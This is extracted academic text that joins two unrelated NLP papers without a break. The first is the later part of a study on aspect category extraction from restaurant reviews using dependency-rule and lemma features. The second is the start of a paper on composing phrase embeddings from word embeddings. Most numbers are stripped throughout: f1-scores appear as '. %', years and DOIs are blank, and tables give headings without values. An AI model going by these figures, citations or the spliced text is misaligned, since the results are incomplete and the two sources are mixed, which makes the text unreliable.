except determinant (det) relation are used to extract rule-based features. for each pair of features in an aspect category, its term frequency is calculated and distinct features are selected. here, term frequency is not applied for feature selection as many dependency relations will not occur regularly. from these selected features, a matrix is generated which contains review id, feature, its term frequency in each aspect category and the actual aspect category label. 
this matrix is the training matrix. testing is performed similar to lemma based approach but the difference is that from each test sentence instead of lemma features rule-based features are extracted. in the second experimentation, features are not selected by considering all grammatical rules. here, the dependency relations which contain any of the nouns, adjectives, adverbs are used to extract features. the rules used are mentioned below (de marneffe & manning, ): acomp: adjectival complement in a sentence, when an adjectival phrase acts as a complement to the main verb in the sentences it is defined as an adjectival complement. advcl: adverbial clause modifier in a complex sentence, the clause modifying the relationship of the verbal phrases (viz. temporal, conditional, comparative, purpose clause, concessional, manner and result) is identified as an adverbial clause modifier. advmod: adverb modifier in a sentence or phrase an adverb modifier can be defined as a word that modifies a noun, an adjective or a verb; especially in a non-clausal sentence. agent: agent an agent is a word that complements the passive verb in a sentence and is explained further by the use of the preposition “by”. unlike basic dependencies output, this association is present only in sentences where collapsed dependencies appear. amod: adjectival modifier in a sentence or a phrase, when an adjectival phrase alters the meaning of the noun phrase, it is called as an adjectival modifier. bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conj: conjunct a conjunct explains the association between two words that are related and connected by using the co-ordinating conjunctions like “and”, “or”, etc. the conjuncts are treated unevenly; wherein the first conjunct leads and the other conjuncts are dependent on the first by way of relation. cop: copula a copula is a connecting word, particularly a form of a verb that connects the subject and the complement. copula is often considered to be dependent on its complement. dobj: direct object a direct object is a noun, noun phrase, or pronoun that signifies what or who receives the action of a transitive verb in a clause or sentence. neg: negation modifier a negation modifier identifies the connection between a negation word or phrase and the np or vp it modifies. nn: noun compound modifier a noun compound modifier refers to a noun in the sentence that provides a better understanding of the head noun and tends to modify it. nsubj: nominal subject a noun phrase is a pro-agent of a clause in a sentence which is also known as a syntactic subject is called a nominal subject. the association in the sentence; unlike standard grammar rules, isn’t controlled by the verb. when there is a copular verb, the root of the clause is the complement of the copular verb which could either be an adjective or a noun. nsubjpass: passive nominal subject when a nominal subject; which is the syntactic subject, is used in a passive voice in a sentence, it is defined as a passive nominal subject. rcmod: relative clause modifier a relative clause that modifies the noun phrase is known as a relative clause modifier. it is placed next to the noun it modified but can also be separated wherein an essential modifier is used. the association moves from the noun phrase to the relative clause; usually by use of a verb. 
[figure: dependency relations in a sentence — dependency parse of "i like the tasty food in this restaurant", with relations such as nsubj, dobj, det, amod, case and nmod linking related words.]

xcomp: open clausal complement
a predicative or clausal complement (without its own subject) of a verb or an adjective is known as an open clausal complement. the subject in this case is indicated by words or phrases external to the xcomp. the clausal complements are not adjuncts or modifiers and are always non-finite.

nmod: nominal modifier
the nmod relation holds between a noun or predicate and the noun introduced by the preposition of a prepositional supplement that modifies it.

the testing shows that the system using features extracted with these selective dependency relations performs better than the system that uses all dependency relations.

c) hybrid features: in this method, both lemma features and rule-based features are used to obtain the training matrix. the rule-based features are extracted using the dependency relations listed in section b, and the lemma features are selected using the multivariate filter method. the training matrices of the two feature types are concatenated into a single training matrix. at test time, both lemma features and rule-based features are extracted from each sentence, and the same testing process described for the base system is followed to determine the aspect category label. this experimentation shows that the performance of aspect category extraction improves when rule-based features are combined with lemma features. algorithms 1–3 describe the proposed hybrid method in detail.

results and discussion
this research is carried out on the semeval restaurant review dataset and on the yelp and kaggle datasets. for the semeval dataset, fig. shows the relative percentage of the total number of sentences in each aspect category. the distribution of data across the aspect categories is not balanced, which affects the performance of the classifier: in this dataset, % of sentences belong to the food aspect category while the price category accounts for only %. to handle this problem, features are not extracted from the dataset as a whole, because doing so would select features from the major categories only. in the proposed work, review sentences are grouped by aspect category and the proposed method is then applied to extract features from each aspect category, so that relevant features are selected for every category. some sentences in the semeval dataset have more than one aspect category; fig. shows this distribution: % of sentences have a single aspect category, % have two aspect categories, and % have more than two. the proposed system extracts only one aspect category per sentence, so in the training and test data, sentences with multiple aspect categories are duplicated and each copy is assigned a single category.

the evaluation measure used in this experimentation is the f1-score, which is used to compare the results of the different tests. the f1-score is calculated from precision and recall as defined below.
in the equations below, tp is true positive, fp is false positive, and fn is false negative.

f1 = (2 × precision × recall) / (precision + recall)
precision = tp / (tp + fp)
recall = tp / (tp + fn)

algorithm 1: feature selection using the multivariate filter method.
preprocessing: stop word removal and stemming are done for all training samples.
input: frequency[i][j]k, the matrix of features in aspect category k containing the occurrence count (tf) j of feature i; the threshold thf on tf; the threshold thc on correlation.
output: a training matrix.
step 1: for every feature f in frequency[][]: if frequency[f] ≥ thf, add f to rfrequency. end for. all selected distinct/unique features are then added to ufrequency[][].
step 2: for every feature f in ufrequency: weight(f) = ufrequency[f][j] / total[f], where total[f] is the tf of that feature over all aspect categories and ufrequency[f][j] is its tf in aspect category j. if weight(f) > thwk, where thwk is the threshold on weight in aspect category k, add f to weighted[f][j], where weighted[f][j] represents the tf of feature f in aspect category j and j ranges over the aspect categories. end if. end for. the weight threshold is different for each aspect category.
step 3: the matrix weighted[i][j] is reorganized with i = {t1, ..., tn} and j = {ak1, ..., akk} representing the aspect categories; each row of weighted[i][j] holds the tf of feature i in aspect categories ak1..akk.
step 4: for every ti in weighted, compute its correlation with the other features in aspect category ak:
cor[t] = (n Σ(x·y) − Σx·Σy) / sqrt((n Σx² − (Σx)²)(n Σy² − (Σy)²))
end for. compute the average correlation for each term and store it in weighted[i][j+1].
step 5: to avoid redundancy, features are selected based on correlation. for every t in weighted[i][j+1]: cor[t] = weighted[i][j+1]; if cor[t] ≤ thc, copy row weighted[t][j] to trainmatrixl[t][l]. end if. end for. trainmatrixl[][] is the training matrix.

algorithm 2: feature extraction based on dependency rules.
input: training dataset.
output: a training matrix.
step 1: for every sentence s in the training dataset d, extract grammatical rule-based features using the stanford nlp parser.
step 2: for every rule-based feature, find its occurrence count in the corresponding aspect category.
step 3: for each aspect category, prepare a matrix containing the distinct rule-based features with their occurrence counts in that aspect category.
step 4: prepare the matrix dptrainmatrixl[i][j] of all rule-based features, where i represents the feature/term and j represents its occurrence count in the aspect categories {ak1, ..., akk} and the actual category label.

algorithm 3: aspect category extraction using hybrid features.
preprocessing: stop word removal and stemming are applied to all test samples; punctuation marks are removed from the test samples and contractions are replaced with their full forms.
input: trainmatrixl[i][j], dptrainmatrixl[m][n], test dataset.
output: aspect labels for the test sentences.
step 1: generate the hybrid training matrix hybridmatrix[i][j] = concat(trainmatrixl, dptrainmatrixl).
step 2: extract lemma and rule-based features from each test sentence.
step 3: for every sentence k in the test dataset: for every feature f of sentence k: for every term t in hybridmatrix[t][j]: if the test feature f equals the term in hybridmatrix, then test[f][..] = hybridmatrix[t][..]. end if. end for. end for. end for.
step 4: calculate the probability of each aspect group.
step 5: the aspect group with the maximum probability value is returned as the label of the test sentence.
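to make algorithms 1–3 concrete, the following sketch shows one possible reading of the pipeline. it is a minimal illustration under several assumptions: feature counts are held in plain dictionaries, spacy is used as a stand-in for the stanford nlp parser (dependency label inventories differ between the two and would need mapping), a single weight threshold replaces the per-category thwk, the per-category "probability" in algorithm 3 is taken to be the normalized term-frequency distribution of each matched feature, and all names are ours rather than the authors'.

```python
import numpy as np
import spacy

nlp = spacy.load("en_core_web_sm")  # assumes the small english model is installed

# rough spacy counterparts of the selective relations listed above (illustrative)
SELECTIVE_RELATIONS = {"acomp", "advcl", "advmod", "agent", "amod", "conj",
                       "dobj", "neg", "nsubj", "nsubjpass", "relcl", "xcomp"}

def dependency_features(sentence):
    """algorithm 2, step 1: head-dependent lemma pairs for the kept relations."""
    doc = nlp(sentence)
    return [f"{tok.head.lemma_} {tok.lemma_}"
            for tok in doc if tok.dep_ in SELECTIVE_RELATIONS]

def multivariate_filter(tf, th_f=3, th_w=0.5, th_c=0.5):
    """algorithm 1: tf maps each feature to its per-aspect-category count vector.
    keep features that are frequent, concentrated in some category, and not too
    correlated on average with the other selected features."""
    feats, rows = [], []
    for f, counts in tf.items():
        counts = np.asarray(counts, dtype=float)
        if counts.max() < th_f:            # step 1: minimum term frequency
            continue
        weights = counts / counts.sum()    # step 2: share of occurrences per category
        if weights.max() > th_w:
            feats.append(f)
            rows.append(counts)
    m = np.vstack(rows)                    # step 3: feature x category tf matrix
    corr = np.corrcoef(m)                  # step 4: pearson correlation between features
    avg_corr = (corr.sum(axis=1) - 1.0) / max(len(feats) - 1, 1)
    keep = avg_corr <= th_c                # step 5: drop redundant features
    return {f: row for f, row, k in zip(feats, m, keep) if k}

def predict_category(features, hybrid_matrix, categories):
    """algorithm 3: sum the per-category distributions of the matched hybrid
    features and return the category with the highest total score."""
    scores = np.zeros(len(categories))
    for f in features:
        counts = hybrid_matrix.get(f)
        if counts is not None:
            counts = np.asarray(counts, dtype=float)
            scores += counts / counts.sum()
    return categories[int(np.argmax(scores))] if scores.any() else None
```

in the actual system the weight threshold varies by aspect category and the hybrid matrix is the concatenation of the lemma-based and rule-based training matrices; the sketch collapses both details for brevity.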
[figure: relative percentage of the number of sentences in each aspect category (food, miscellaneous, service, ambience, price) in the semeval dataset; y-axis: number of sentences (%).]

table shows the f1-score obtained when only lemma features are used. for lemma features, two feature selection strategies are used: the term frequency-based approach, which is the base system, and the multivariate filter-based approach. the results demonstrate the first objective, namely that the feature selection approach improves classification performance. the table shows that the multivariate filter method of feature selection achieves a higher f1-score in all aspect categories than the base system. this feature selection strategy selects relevant features and avoids redundant ones, whereas the base system considers only relevance and ignores redundancy among features.

[figure: number of aspect categories per sentence (one, two, or more than two) as a percentage of sentences in the semeval dataset.]

table: f1-score (%) obtained using the term frequency-based feature selection approach and the multivariate filter feature selection approach (semeval dataset). for each approach, the table reports precision (%), recall (%) and f1-score (%) for the ambience, miscellaneous, food, price and service aspect categories.

table shows the f1-scores obtained using approach b, in which features are selected using dependency relations. in the first experimentation of approach b, features are extracted by considering all dependency relations; in the second, features are extracted by applying selective dependency relations. if all dependency relations are used to extract features, the number of redundant features increases and some irrelevant features are also extracted, which degrades classification performance. the dependency relations considered here are selective, which helps to choose relevant features. another objective of this research is to analyze the effect of dependency rule-based features on classification performance. this testing shows that features extracted using selective dependency relations improve the performance of classification. table shows the outcomes obtained using the proposed technique.
in it, the hybrid features include lemma-based features selected using the multivariate filter feature selection method and rule-based features extracted by applying selective dependency relations. the table shows that the proposed hybrid system achieves an f1-score of . %, which is higher than the f1-score attained in schouten et al. ( ) with either the supervised or the unsupervised approach. the proposed system attains improved results for the food and ambience aspect categories in comparison to the supervised approach of schouten et al. ( ). the unsupervised approach in schouten et al. ( ) assigns the aspect category by taking into account the terms in the sentence; it is an unsupervised solution in that it prohibits the use of labels and instead generates a collection of seed terms for each aspect category, created using a semantic lexicon such as wordnet.

table: f1-score (%) of the system using features extracted by applying (i) all dependency relations and (ii) selective dependency relations (semeval dataset). for each setting, the table reports precision (%), recall (%) and f1-score (%) for the ambience, miscellaneous, food, price and service aspect categories.

table: f1-score (%) of the proposed approach using hybrid features (semeval restaurant review dataset), reporting precision (%), recall (%) and f1-score (%) for the ambience, miscellaneous, food, price and service aspect categories.

fig. shows the precision and recall values obtained using different methods, all implemented on the semeval restaurant review dataset. the precision and recall percentages of the proposed system are improved relative to the other methods. in the proposed system, the feature selection method is applied to the lemma features and the selective dependency relations are used to select the dependency rule-based features, which encourages relevant features to be picked; in addition, the use of correlation helps to prevent feature redundancy. the use of relevant features and the elimination of redundancy result in increased precision and recall.

table: f1-score (%) obtained using different methods, reporting precision (%), recall (%) and f1-score (%). on the semeval restaurant review dataset, the compared methods are the proposed system with hybrid features, the unsupervised and supervised approaches of schouten et al. ( ), and brychcín, konkol & steinberger ( ). on the yelp restaurant review dataset, the compared methods are the proposed system with hybrid features, kiritchenko et al. ( ) (constrained) and panchendrarajan et al. ( ). for patient reviews on drugs (kaggle dataset; rachel, ), the result of the proposed system with hybrid features is reported.

[figure: precision and recall (%) of different methods on the semeval restaurant review dataset — proposed system with hybrid features, schouten et al. ( ) unsupervised approach, schouten et al. ( ) supervised approach, and brychcín, konkol & steinberger ( ).]
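for reference, the per-category precision, recall and f1 values reported in these comparisons follow the equations given earlier; a small helper that computes them from gold and predicted category labels might look like this (a sketch with names of our own choosing, not code from the paper).

```python
def category_scores(gold, predicted, category):
    """precision, recall and f1 for one aspect category,
    given parallel lists of gold and predicted labels."""
    tp = sum(1 for g, p in zip(gold, predicted) if p == category and g == category)
    fp = sum(1 for g, p in zip(gold, predicted) if p == category and g != category)
    fn = sum(1 for g, p in zip(gold, predicted) if p != category and g == category)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * precision * recall / (precision + recall) if precision + recall else 0.0
    return precision, recall, f1
```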
the methods cited in fig. used the yelp restaurant review dataset. the table shows that the proposed system achieves improved results on this dataset compared to the other methods. in this work, reviews are randomly selected from the yelp dataset; of these, are used at the time of training and are used for testing. these results are obtained by considering categories such as restaurant, ambience, food and service. the algorithm is also tested on a kaggle dataset that includes patient reviews on drugs, where the aspect categories are disease names. the system yields an f1-score of . % on the kaggle dataset; for this experimentation, reviews are randomly selected from kaggle.

[figure: precision and recall (%) of different methods on the yelp dataset — proposed system with hybrid features, kiritchenko et al. ( ) (constrained), and panchendrarajan et al. ( ).]

conclusions
in this work, two approaches for the aspect category prediction task are proposed. in the first, a multivariate filter approach to feature selection is offered; it shows that relevant features increase classification performance when redundancy among the selected features is reduced. in the second approach, dependency relation based features are selected for aspect category prediction; it shows that features extracted using selective grammatical rules improve classification performance compared to features extracted using all rules. the hybrid feature set is a combination of multivariate filter based lemma features and selective grammatical rule-based features, and its use increases the f1-score of the aspect detection task to . %. this work can be further extended by adding semantic features and using a combination of supervised and unsupervised approaches. the feature set can also be enhanced by adding bi-tagged features.

additional information and declarations
funding
the authors received no funding for this work.
competing interests
the authors declare that they have no competing interests.
author contributions
bhavana r. bhamare conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, implemented the full work, and approved the final draft.
jeyanthi prabhu conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, helped in the implementation of the full work, and approved the final draft.
data availability
the following information was supplied regarding data availability:
data and code are available at github: https://github.com/bhavanaacc/absa.
semeval data is available at metashare: http://metashare.ilsp.gr: /repository/browse/semeval- -absa-train-data-v -annotation-guidelines/ b b e a e b b a d c a f a beef a f f /. this dataset can be accessed after completing the registration process; after registering with a username and password, one can access the dataset. under the distribution licence of the dataset provider, the restriction is that the dataset can be used for "academic non-commercial use, no redistribution".
yelp data is available at kaggle: https://www.kaggle.com/omkarsabnis/yelp-reviews-dataset.
drug data is also available at kaggle: https://www.kaggle.com/jessicali /kuc- hackathon-winter- ?select=drugscomtest_raw.csv. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abualigah lm, khader at, al-betar ma, alomari oa. . text feature selection with a robust weight scheme and dynamic dimension reduction to text document clustering. expert systems with applications : – doi . /j.eswa. . . . afzaal m, usman m, fong a. . tourism mobile app with aspect-based sentiment classification framework for tourist reviews. ieee transactions on consumer electronics ( ): – doi . /tce. . . agarwal b, poria s, mittal n, gelbukh a, hussain a. . concept-level sentiment analysis with dependency-based semantic parsing: a novel approach. cognitive computation ( ): – doi . /s - - - . ahmad k, cheng d, almas y. . multi-lingual sentiment analysis of financial news streams. in: st international workshop on grid technology for financial modeling and simulation. trieste: sissa medialab . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/bhavanaacc/absa http://metashare.ilsp.gr: /repository/browse/semeval- -absa-train-data-v -annotation-guidelines/ b b e a e b b a d c a f a beef a f f / http://metashare.ilsp.gr: /repository/browse/semeval- -absa-train-data-v -annotation-guidelines/ b b e a e b b a d c a f a beef a f f / http://metashare.ilsp.gr: /repository/browse/semeval- -absa-train-data-v -annotation-guidelines/ b b e a e b b a d c a f a beef a f f / https://www.kaggle.com/omkarsabnis/yelp-reviews-dataset https://www.kaggle.com/omkarsabnis/yelp-reviews-dataset https://www.kaggle.com/jessicali /kuc-hackathon-winter- ?select=drugscomtest_raw.csv https://www.kaggle.com/jessicali /kuc-hackathon-winter- ?select=drugscomtest_raw.csv http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /tce. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ akhtar n, zubair n, kumar a, ahmad t. . aspect based sentiment oriented summarization of hotel reviews. procedia computer science : – doi . /j.procs. . . . al moubayed n, mcgough s, hasan ba. . beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling. peerj computer science ( ):e doi . /peerj-cs. . al-smadi m, al-ayyoub m, jararweh y, qawasmeh o. . enhancing aspect-based sentiment analysis of arabic hotels’ reviews using morphological, syntactic and semantic features. information processing & management ( ): – doi . /j.ipm. . . . amplayo rk, lee s, song m. . incorporating product description to sentiment topic models for improved aspect-based sentiment analysis. information sciences – : – doi . /j.ins. . . . anand d, naorem d. . semi-supervised aspect based sentiment analysis for movies using review filtering. procedia computer science : – doi . /j.procs. . . . asghar mz, khan a, ahmad s, qasim m, khan ia. . lexicon-enhanced sentiment analysis framework using rule-based classification scheme. plos one ( ):e doi . /journal.pone. . asghar mz, khan a, zahra sr, ahmad s, kundi fm. . aspect-based opinion mining framework using heuristic patterns. cluster computing (s ): – doi . /s - - - . baas f, bus o, osinga a, van de ven n, van loenhout s, vrolijk l, schouten k, frasincar f. . 
exploring lexico-semantic patterns for aspect-based sentiment analysis. in: proceedings of the th acm/sigapp symposium on applied computing, – . benkhelifa r, bouhyaoui n, laallam fz. . a real-time aspect-based sentiment analysis system of youtube cooking recipes. in: machine learning paradigms: theory and application. cham: springer, – . bhamare br, jeyanthi p, subhashini r. . aspect category extraction for sentiment analysis using multivariate filter method of feature selection. international journal of recent technology and engineering ( ): – doi . /ijrte.c . . brychcín t, konkol m, steinberger j. . uwb: machine learning approach to aspect-based sentiment analysis. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin, – . de kok s, punt l, van den puttelaar r, ranta k, schouten k, frasincar f. a. review-aggregated aspect-based sentiment analysis with ontology features. progress in artificial intelligence ( ): – doi . /s - - - . de kok s, punt l, van den puttelaar r, ranta k, schouten k, frasincar f. b. review-level aspect-based sentiment analysis using an ontology. in: proceedings of the rd annual acm symposium on applied computing, – . de marneffe mc, manning cd. . stanford typed dependencies manual. available at https:// nlp.stanford.edu/software/dependencies_manual.pdf. el hannach h, benkhalifa m. . wordnet based implicit aspect sentiment analysis for crime identification from twitter. international journal of advanced computer science and applications : – . firmanto a, sarno r. . aspect-based sentiment analysis using grammatical rules, word similarity and senticircle. international journal of intelligent engineering and systems ( ): – doi . /ijies . . . hu m, liu b. . mining and summarizing customer reviews. in: proceedings of the tenth acm sigkdd international conference on knowledge discovery and data mining. – . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /j.ipm. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ijrte.c . http://dx.doi.org/ . /s - - - https://nlp.stanford.edu/software/dependencies_manual.pdf https://nlp.stanford.edu/software/dependencies_manual.pdf http://dx.doi.org/ . /ijies . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kang y, zhou l. . rube: rule-based methods for extracting product features from online consumer reviews. information & management ( ): – doi . /j.im. . . . kim k. . an improved semi-supervised dimensionality reduction using feature weighting: application to sentiment analysis. expert systems with applications : – doi . /j.eswa. . . . kiritchenko s, zhu x, cherry c, mohammad s. . nrc-canada- : detecting aspects and sentiment in customer reviews. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin, – . kumar r, pannu hs, malhi ak. . aspect-based sentiment analysis using deep networks and stochastic optimization. neural computing and applications ( ): – doi . /s - - -z. labani m, moradi p, ahmadizar f, jalili m. . a novel multivariate filter method for feature selection in text classification problems. engineering applications of artificial intelligence : – doi . /j.engappai. . . . liu h, zhou mc, lu xs, yao c. . weighted gini index feature selection method for imbalanced data. 
in: ieee th international conference on networking, sensing and control. piscataway: ieee, – . ma y, peng h, cambria e. . targeted aspect-based sentiment analysis via embedding commonsense knowledge into an attentive lstm. in: thirty-second aaai conference on artificial intelligence. – . manek as, shenoy pd, mohan mc, venugopal kr. . aspect term extraction for sentiment analysis in large movie reviews using gini index feature selection method and svm classifier. world wide web ( ): – doi . /s - - -x. panchendrarajan r, ahamed n, sivakumar p, murugaiah b, ranathunga s, pemasiri a. . eatery: a multi-aspect restaurant rating system. in: proceedings of the th acm conference on hypertext and social media. new york: acm, – . pontiki m, galanis d, papageorgiou h, androutsopoulos i, manandhar s, al-smadi m, al-ayyoub m, zhao y, qin b, de clercq o, hoste v, apidianaki m, tannier x, loukachevitch n, kotelnikov e, bel n, jiménez-zafra sm, eryiğit g. . semeval- task : aspect based sentiment analysis. in: th international workshop on semantic evaluation. poria s, cambria e, ku lw, gui c, gelbukh a. . a rule-based approach to aspect extraction from product reviews. in: proceedings of the second workshop on natural language processing for social media. – . rachel jl. . uci ml drug review dataset. available at https://www.kaggle.com/jessicali / kuc-hackathon-winter- . rana ta, cheah yn. a. a two-fold rule-based model for aspect extraction. expert systems with applications : – doi . /j.eswa. . . . rana ta, cheah yn. b. improving aspect extraction using aspect frequency and semantic similarity-based approach for aspect-based sentiment analysis. in: international conference on computing and information technology. cham: springer, – . rana ta, cheah yn. . sequential patterns rule-based approach for opinion target extraction from customer reviews. journal of information science ( ): – doi . / . ruskanda fz, widyantoro dh, purwarianti a. . comparative study on language rule based methods for aspect extraction in sentiment analysis. in: international conference on asian language processing. piscataway: ieee, – . bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.im. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /s - - -x https://www.kaggle.com/jessicali /kuc-hackathon-winter- https://www.kaggle.com/jessicali /kuc-hackathon-winter- http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ schouten k, frasincar f. . ontology-driven sentiment analysis of product and service aspects. in: european semantic web conference. cham: springer, – . schouten k, frasincar f, de jong f. . ontology-enhanced aspect-based sentiment analysis. in: international conference on web engineering. cham: springer, – . schouten k, van der weijde o, frasincar f, dekker r. . supervised and unsupervised aspect category detection for sentiment analysis with co-occurrence data. ieee transactions on cybernetic ( ): – doi . /tcyb. . . shafie as, sharef nm, murad maa, azman a. . aspect extraction performance with pos tag pattern of dependency relation in aspect-based sentiment analysis. in: fourth international conference on information retrieval and knowledge management (camp). piscataway: ieee, – . uysal ak. . an improved global feature selection scheme for text classification. expert systems with applications : – doi . /j.eswa. . . . vanaja s, belwal m. . 
aspect-level sentiment analysis on e-commerce data. in: international conference on inventive research in computing applications. coimbatore: ieee, – .
xu q, zhu l, dai t, guo l, cao s. . non-negative matrix factorization for implicit aspect identification. journal of ambient intelligence and humanized computing ( ): – doi . /s - - - .
zeng d, dai y, li f, wang j, sangaiah ak. . aspect based sentiment analysis by a linguistically regularized cnn with gated mechanism. journal of intelligent & fuzzy systems ( ): – doi . /jifs- .
learning composition models for phrase embeddings. mo yu, machine intelligence & translation lab, harbin institute of technology, harbin, china, gflfof@gmail.com. mark dredze, human language technology center of excellence, center for language and speech processing, johns hopkins university, baltimore, md, mdredze@cs.jhu.edu.

abstract
lexical embeddings can serve as useful representations for words for a variety of nlp tasks, but learning embeddings for phrases can be challenging. while separate embeddings are learned for each word, this is infeasible for every phrase. we construct phrase embeddings by learning how to compose word embeddings using features that capture phrase structure and context. we propose efficient unsupervised and task-specific learning objectives that scale our model to large datasets. we demonstrate improvements on both language modeling and several phrase semantic similarity tasks with various phrase lengths. we make the implementation of our model and the datasets available for general use.

introduction
word embeddings learned by neural language models (bengio et al., ; collobert and weston, ; mikolov et al., b) have been successfully applied to a range of tasks, including syntax (collobert and weston, ; turian et al., ; collobert, ) and semantics (huang et al., ; socher et al., b; hermann et al., ). however, phrases are critical for capturing lexical meaning for many tasks. for example, collobert and weston ( ) showed that word embeddings yielded state-of-the-art systems on word-oriented tasks (pos, ner) but performance on phrase-oriented tasks, such as srl, lags behind. we propose a new method for compositional semantics that learns to compose word embeddings into phrases. in contrast to a common approach to phrase embeddings that uses pre-defined composition operators (mitchell and lapata, ), e.g., component-wise sum/multiplication, we learn composition functions that rely on phrase structure and context. other work on learning compositions relies on matrices/tensors as transformations (socher et al., ; socher et al., a; hermann and blunsom, ; baroni and zamparelli, ; socher et al., ; grefenstette et al., ). however, this work suffers from two primary disadvantages. first, these methods have high computational complexity for dense embeddings: o(d ) or o(d ) for composing every two components with d dimensions. the high computational complexity restricts these methods to use very low-dimensional embeddings ( or ). while low-dimensional embeddings perform well for syntax (socher et al., a) and sentiment (socher et al., b) tasks, they do poorly on semantic tasks.
second, because of the complexity, they use supervised training with small task-specific datasets. an exception is the unsupervised objective of recursive auto-encoders (socher et al., ). yet this work cannot utilize contextual features of phrases and still poses scaling challenges.

in this work we propose a novel compositional transformation called the feature-rich compositional transformation (fct) model. fct produces phrases from their word components. in contrast to previous work, our approach to phrase composition can efficiently utilize high-dimensional embeddings (e.g. d = ) with an unsupervised objective, both of which are critical to doing well on semantics tasks. our composition function is parameterized to allow the inclusion of features based on the phrase structure and contextual information, including positional indicators of the word components. the phrase composition is a weighted summation of embeddings of component words, where the summation weights are defined by the features, which allows for fast composition.

we discuss a range of training settings for fct. for tasks with labeled data, we utilize task-specific training. we begin with embeddings trained on raw text and then learn compositional phrase parameters as well as fine-tune the embeddings for the specific task's objective. for tasks with unlabeled data (e.g. most semantic tasks) we can train on a large corpus of unlabeled data. for tasks with both labeled and unlabeled data, we consider a joint training scheme. our model's efficiency ensures we can incorporate large amounts of unlabeled data, which helps mitigate over-fitting and increases vocabulary coverage.

we begin with a presentation of fct (§ ), including our proposed features for the model. we then present three training settings (§ ) that cover language modeling (unsupervised), task-specific training (supervised), and joint (semi-supervised) settings. the remainder of the paper is devoted to evaluation of each of these settings.

feature-rich compositional transformations from words to phrases

we learn transformations for composing phrase embeddings from the component words based on features extracted from a phrase, where we assume that the phrase boundaries are given. the resulting phrase embedding is a per-dimension weighted average of the component words. consider the example of base noun phrases (np), a common phrase type which we want to compose. base nps often have flat structures – all words modify the head noun – which means that our transformation should favor the head noun in the composed phrase embedding. for each of the n words w_i in phrase p we construct the embedding:

e_p = Σ_{i=1}^{n} λ_i ⊙ e_{w_i}    (1)

where e_{w_i} is the embedding for word i, and ⊙ refers to the point-wise product. λ_i is a weight vector that is constructed based on the features of p and the model parameters:

λ_{ij} = Σ_k α_{jk} f_k(w_i, p) + b_{ij}    (2)

where f_k(w_i, p) is a feature function that considers word w_i in phrase p and b_{ij} is a bias term. this model is fast to train since it has only linear transformations: the only operations are vector summation and inner product. therefore, we learn the model parameters α together with the embeddings.
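to make eqs. (1)–(2) concrete, the following is a minimal numpy sketch of the composition; it is not the authors' released implementation, and the function names, array shapes, and the encoding of features as a plain numeric vector per word are our own illustrative assumptions.

```python
import numpy as np

def fct_compose(word_vecs, feat_vecs, alpha, bias):
    # word_vecs[i]: embedding e_{w_i}, shape (d,)
    # feat_vecs[i]: feature vector f(w_i, p), shape (k,)
    # alpha: feature-weight matrix, shape (d, k); bias[i]: per-word bias, shape (d,)
    phrase = np.zeros_like(word_vecs[0], dtype=float)
    for e_w, f, b_i in zip(word_vecs, feat_vecs, bias):
        lam = alpha @ f + b_i        # eq. (2): per-dimension weights lambda_i
        phrase += lam * e_w          # eq. (1): weighted point-wise sum
    return phrase
```

because the transformation is a per-dimension weighted sum, the cost of composing a phrase is linear in d, which is what allows the high-dimensional embeddings discussed above.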
we call this the feature-rich compositional transformation (fct) model. consider some example phrases and associated features. the phrase "the museum" should have an embedding nearly identical to "museum" since "the" has minimal impact on the phrase's meaning. this can be captured through part-of-speech (pos) tags, where a tag of dt on "the" will lead to λ_i ≈ 0, removing its impact on the phrase embedding. in some cases, words will have specific behaviors. in the phrase "historic museum", the word "historic" should move the phrase embedding closer to "landmark". to capture this behavior we add smoothed lexical features, where smoothing reduces data sparsity effects. these features can be based on word clusters, themselves induced from pre-trained word embeddings.

our feature templates are shown in table 1. phrase boundaries, tags and heads are identified using existing parsers or from annotated gigaword (napoles et al., ) as described in the experiments. in eq. (1), we do not limit phrase structure, though the features in table 1 tend to assume a flat structure. however, with additional features the model could handle longer phrases with hierarchical structures, and adding these features does not change our model or training objectives. following the semantic tasks used for evaluation we experimented with base nps (including both bigram nps and longer ones). we leave explorations of features for complex structures to future work.

table 1: feature templates for word w_i in phrase p.
- pos tags — simple: t(w_{i-1}), t(w_i), t(w_{i+1}); compound: <t(w_k), t(w_{k+1})> for k ∈ {i-1, i}
- word clusters — simple: c(w_{i-1}), c(w_i), c(w_{i+1}); compound: <c(w_k), c(w_{k+1})> for k ∈ {i-1, i}
- word forms — simple: w_{i-1}, w_i, w_{i+1} if w_i is a function word
- head word — simple: I[i = h]; compound: <t(w_k), I[i = h]> and <c(w_k), I[i = h]> for k ∈ {i-1, i, i+1}
- distance from head — simple: dis(h − i); compound: <t(w_k), dis(h − i)> and <c(w_k), dis(h − i)> for k ∈ {i-1, i, i+1}
